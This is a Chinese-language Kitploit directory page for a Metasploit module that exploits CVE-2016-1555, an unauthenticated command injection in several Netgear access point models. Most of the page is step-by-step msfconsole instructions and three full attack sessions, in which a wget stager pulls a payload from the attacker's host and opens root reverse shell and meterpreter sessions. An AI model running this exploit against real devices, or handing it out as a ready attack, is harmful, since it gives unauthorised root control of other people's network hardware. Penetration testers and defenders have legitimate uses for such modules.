Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2016-1555 — Metasploit 模块,利用多款 Netgear 路由器型号中的未认证命令注入漏洞,以 root 权限实现远程代码执行。 | Kitploit
工具/GitHubGitHub/ide0x90/cve-2016-1555
嵌入式系统安全漏洞利用框架物联网安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubide0x90/cve-2016-1555

cve-2016-1555

Metasploit 模块,利用多款 Netgear 路由器型号中的未认证命令注入漏洞,以 root 权限实现远程代码执行。

查看仓库
227年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

描述

该模块利用了 Netgear WN604(3.3.3 之前版本)以及 WN802Tv2、WNAP210v2、WNAP320、WNDAP350、WNDAP360 和 WNDAP660(3.5.5.0 之前版本)中未经验证的任意命令执行漏洞。该漏洞存在于路由器处理来自 (1) boardData102.php、(2) boardData103.php、(3) boardDataJP.php、(4) boardDataNA.php 和 (5) boardDataWW.php 的 POST 请求的方式中。该漏洞由 FIRMADYNE (https://github.com/firmadyne/firmadyne) 的创建者 Daming Dominic Chen 发现。

存在漏洞的应用

  1. 启动 msfconsole
  2. 执行:use exploit/linux/http/netgear_unauth_exec
  3. 执行:set RHOST [RouterIP]
  4. 如果你的 payload 不是托管在其他系统上,请执行:set SRVHOST [Your server's IP]
  5. 执行:set LHOST [Your IP]
  6. 如果你想要某个特定的 MAC 地址而不是随机地址,请执行:set MAC_ADDRESS [12 digit number]
  7. 如果你想将另一个 URI 作为目标,而不是默认的 boardDataWW.php,请执行:set TARGETURI [target URI]
  8. 如果你想要 meterpreter 会话,请执行:set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
  9. 执行:exploit
  10. 如果路由器存在漏洞,payload 应通过 wget(默认的 HTTP stager)投递并执行,你应该能获得一个会话

使用默认 payload (linux/mipsbe/shell_reverse_tcp) 的示例

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
[*] Command Stager progress - 118.97% done (138/116 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

使用 meterpreter (linux/mipsbe/meterpreter/reverse_tcp) 的示例

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
[*] Sending payload to 192.168.200.100 (Wget)
[*] Sending stage (1108408 bytes) to 192.168.200.100
[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
[*] Command Stager progress - 118.33% done (142/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.200.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

使用其他存在漏洞的 URI (boardDataNA.php) 的示例

root@kitploit:~
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
TARGETURI => boardDataNA.php
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
[*] Command Stager progress - 118.64% done (140/118 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)
下载工具